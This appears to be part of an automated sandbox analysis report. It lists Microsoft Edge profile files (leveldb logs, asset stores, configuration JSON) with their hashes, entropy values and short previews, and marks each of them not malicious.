                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222874922916056
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:v+/PN8F5fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8rfx2mjF
                                                                                                                                                                                                                                                                                                                                                        MD5:6E9FFD38BD388EA0DB49EF23D9ED3E32
                                                                                                                                                                                                                                                                                                                                                        SHA1:2DFE7B84F86572F586D48684A150E026377B14A6
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CEC20259714758AA518290637E672CD2CE480B4F9FD5781682C5A0F1D206A70A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:578BDF011E2073255C7EE06DF566A01A8D62D2B18A47397D8B2F78773A3AEB3B8D27740DB607B06CBF9EFBB2ECEB3CE8DF8013EA12509AE57349C11AF11B339B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.142249675937878
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:HU2ZpMcd3+q2P923oH+Tcwt9Eh1tIFUt8YU2ZD/Zmw+YU2Ff0PXU2ufzvKYU20wh:7+cdOv4Yeb9Eh16FUt8MD//+/UKGh
                                                                                                                                                                                                                                                                                                                                                        MD5:FFC0B767FF186D1724E1A58886AB5F89
                                                                                                                                                                                                                                                                                                                                                        SHA1:2CA2EDEABDB10EF8DDEAD83C82CAB2EBB1E68938
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F37ED8CE8C580163E576296694BCFAFFBFFCEB6F9596EAE622DB473C9F8EACC6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E3BF22E1A11BCFD4349764137287CB657E00BD52A579939E07F56C2145F87E97DA2EB1617D80297381462E1DC90C4A5675BD0AA4E9FD2C7657844BC7E3AC05C9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:2024/11/14-09:29:11.965 1098 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/14-09:29:11.967 1098 Recovering log #3.2024/11/14-09:29:12.457 1098 Level-0 table #3: started.2024/11/14-09:29:12.649 1098 Level-0 table #3: 739855 bytes OK.2024/11/14-09:29:12.654 1098 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.142249675937878
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:HU2ZpMcd3+q2P923oH+Tcwt9Eh1tIFUt8YU2ZD/Zmw+YU2Ff0PXU2ufzvKYU20wh:7+cdOv4Yeb9Eh16FUt8MD//+/UKGh
                                                                                                                                                                                                                                                                                                                                                        MD5:FFC0B767FF186D1724E1A58886AB5F89
                                                                                                                                                                                                                                                                                                                                                        SHA1:2CA2EDEABDB10EF8DDEAD83C82CAB2EBB1E68938
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F37ED8CE8C580163E576296694BCFAFFBFFCEB6F9596EAE622DB473C9F8EACC6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E3BF22E1A11BCFD4349764137287CB657E00BD52A579939E07F56C2145F87E97DA2EB1617D80297381462E1DC90C4A5675BD0AA4E9FD2C7657844BC7E3AC05C9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:2024/11/14-09:29:11.965 1098 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/14-09:29:11.967 1098 Recovering log #3.2024/11/14-09:29:12.457 1098 Level-0 table #3: started.2024/11/14-09:29:12.649 1098 Level-0 table #3: 739855 bytes OK.2024/11/14-09:29:12.654 1098 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.354097956122928
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:EA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:EFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                                                        MD5:B598E5231650774CD06D722B49EE2428
                                                                                                                                                                                                                                                                                                                                                        SHA1:F8024A8E1B03DB6465D7AF7C86BFCAB795056028
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A3B5F7C8C048D470C45A9534AB79449EA4DDDC10736EA4524D1F961F6D5823DD
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2D7974A0B882B99A1A1657A81F01E6A075556D66AE4E98D9B6EA5AA35C9F0F0597D2A94850F96CD00F2616AD9D365C397F1326ECB51E1E0278A36109F499BCFC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1..jxq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13376067976760960..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):311
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.147282555626772
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:HUl5upq1923oH+Tcwtk2WwnvB2KLlVUl2D4q2P923oH+Tcwtk2WwnvIFUv:sUfYebkxwnvFLp4v4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:5099FDD3F606EBBDED53002B29666A55
                                                                                                                                                                                                                                                                                                                                                        SHA1:3FE7BBD5366775CA22E022462FBD700099BF3149
                                                                                                                                                                                                                                                                                                                                                        SHA-256:736AA1685EA12B38BF37D53F9CB6CF68E272DEEC6F3FE711DBC869B5405014E1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:005ECF1E9922FB671273170B1285139C7126304E438F021D75E13A704FE639F515F6AE03364020F467A7FFA9F8F2C1E5C39F3EC262573CA4B13DF63A9ABB7399
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:2024/11/14-09:26:15.606 1cf0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/14-09:26:15.645 1cf0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358860
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324619505189777
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ry:C1gAg1zfvq
                                                                                                                                                                                                                                                                                                                                                        MD5:F1DE3BFCAE1AAE6904A911A2B23BCCFD
                                                                                                                                                                                                                                                                                                                                                        SHA1:BA79062177672975667B252D74499ABE28BCC6A3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:77248481366DAD50813B8A7C944C98B8B5055C56A631878DB78A227337C6BCAE
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D3E22A07D8FC65D0B398F5E93CA44EFCFAD60D19FE228BAB26AAC1DC5780CA4D2CCF3FEA7D92575DBED59D4CF30A9547C6CD90D39112E556255E14FBD3951EE5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\569dcf07-2b71-4137-b11a-89d6c88ccf43.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\69640928-b0c2-48c1-8aee-07cb405dfe76.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1546
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.344921734504277
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcFGJ/I3RdsTcZVMdmRdsTAyZFRudFGRw6C1E6ma3yeesw6maPsRds7ZC52Hu8bd:YcgCzs4tsJfc7aleeBkEs1CgHu8bxo+
